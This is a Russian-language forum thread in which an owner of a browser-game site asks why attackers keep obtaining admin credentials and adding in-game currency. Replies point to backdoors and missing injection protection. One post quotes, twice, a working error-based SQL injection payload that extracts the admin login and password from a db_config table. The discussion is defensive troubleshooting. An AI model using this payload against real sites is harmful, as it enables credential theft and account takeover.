Взлом

  • Автор темы tonime30rus
  • Дата начала
tonime30rus
Участник
Сообщения
93
Реакции
2
Парни подскажите, в чем может быть проблемка как то накручивают себе серебро, узнают пароль и логин и тд. Но админку снес а в базе пароли поменял на все ровно как то удается это сделать в чем проблема?
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
tonime30rus написал(а):
Парни подскажите, в чем может быть проблемка как то накручивают себе серебро, узнают пароль и логин и тд. Но админку снес а в базе пароли поменял на все ровно как то удается это сделать в чем проблема?
видимо у тебя стоит какой то модуль с дырой.ну или сам скрипт с дырой
 
tonime30rus
Участник
Сообщения
93
Реакции
2
kvozimir написал(а):
видимо у тебя стоит какой то модуль с дырой.ну или сам скрипт с дырой
модули все стандартные, а скрипт брал отсюда чистый
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
tonime30rus написал(а):
модули все стандартные, а скрипт брал отсюда чистый
я не помню чтобы кто то говорил что тут скрипт чистый

вискас где то тему создавал про логи посмотри ее и по изучай логи
 
Viktor
Участник
Сообщения
734
Реакции
113
ссылку на сайт напиши сюда!
 
tonime30rus
Участник
Сообщения
93
Реакции
2
kvozimir написал(а):
видимо у тебя стоит какой то модуль с дырой.ну или сам скрипт с дырой
Он пароль логин все узнать может, проверял базу не заходил туда вообще
 
tonime30rus
Участник
Сообщения
93
Реакции
2
Viktor
Участник
Сообщения
734
Реакции
113
дизайн сам делал или заказывал? если кто-то вмешивался, то возможно код закрытый оставил, у меня такое было в одном скрипте, нашел код с другим мылом куда отсылался логин и пароль. Но точно уже не помню что за код. где-то в файлах входа искать надо или может вообще в другом месте быть
 
tonime30rus
Участник
Сообщения
93
Реакции
2
Viktor написал(а):
дизайн сам делал или заказывал? если кто-то вмешивался, то возможно код закрытый оставил, у меня такое было в одном скрипте, нашел код с другим мылом куда отсылался логин и пароль. Но точно уже не помню что за код. где-то в файлах входа искать надо или может вообще в другом месте быть
сам делал, только брал движек с форума а что за код был именно???????
 
Viktor
Участник
Сообщения
734
Реакции
113
  • #10
tonime30rus написал(а):
сам делал, только брал движек с форума а что за код был именно???????
не помню уже что за код был, просто нашел лишний email прописан был в файле, когда удалил, то все хорошо стало, а так он просто с паера деньги списывал, хоть там и мало было, но все-равно не приятно.
 
assus
Если нужна ферма пишите. Дизайн для Ферм.
Участник
Сообщения
454
Реакции
59
Skype
  • #11
Viktor проверь все файлы на лушные коды и ссылки а то в стандартном есть такое и дыры тоже есть
 
tonime30rus
Участник
Сообщения
93
Реакции
2
  • #12
Да проверял не нашел не чего , уже админку удалил все ровно как то крутит что угодно может сделать будто имеет доступ в базу, хотя не имеет
 
Foma
Местный
Сообщения
41
Реакции
6
  • #13
Ooo,я знаю где дыра,могу доказать,пиши в лс
 
SmaiL18
Местный
Сообщения
30
Реакции
9
ICQ
600680419 600680419
  • #14
Вот что ты за человек ну не получается у тебя пилить свой,покупай! А ты просто логически подумай,где с помощью админки можно накрутить себе серебро?
 
tonime30rus
Участник
Сообщения
93
Реакции
2
  • #15
Foma написал(а):
Ooo,я знаю где дыра,могу доказать,пиши в лс
смысл доказать , я тут попросил помочь не а доказывать
 
Foma
Местный
Сообщения
41
Реакции
6
  • #16
Бесплатный сыр в мышеловке)
 
IgrokNEW
Участник
Сообщения
23
Реакции
2
  • #17
Были дыры только по моей ошибке, когда ставил весь проект. Нашли быстро и исправили.
 
alexsoft59
Капитан очевидность...).
Участник
Сообщения
347
Реакции
29
  • #18
tonime30rus написал(а):
смысл доказать , я тут попросил помочь не а доказывать
Вот именно,смысла доказывать нет! Просто смотри свои файлы,там элементарно нет защиты от инъекций даже,и чего ж ты хотел то?
 
Shoma2114
Местный
Сообщения
63
Реакции
2
  • #19
Подскажите Что эта за хрень такая (((
Код:
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '





' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
 
Последнее редактирование модератором:
Rubrika
Участник
Сообщения
342
Реакции
43
  • #20
Shoma2114 написал(а):
Подскажите Что эта за хрень такая (((
Код:
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '





' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '

ну думаю и так понятно, что очень похоже на инъекцию для получения логина и пасса от админки.
 
Последнее редактирование модератором:
Сверху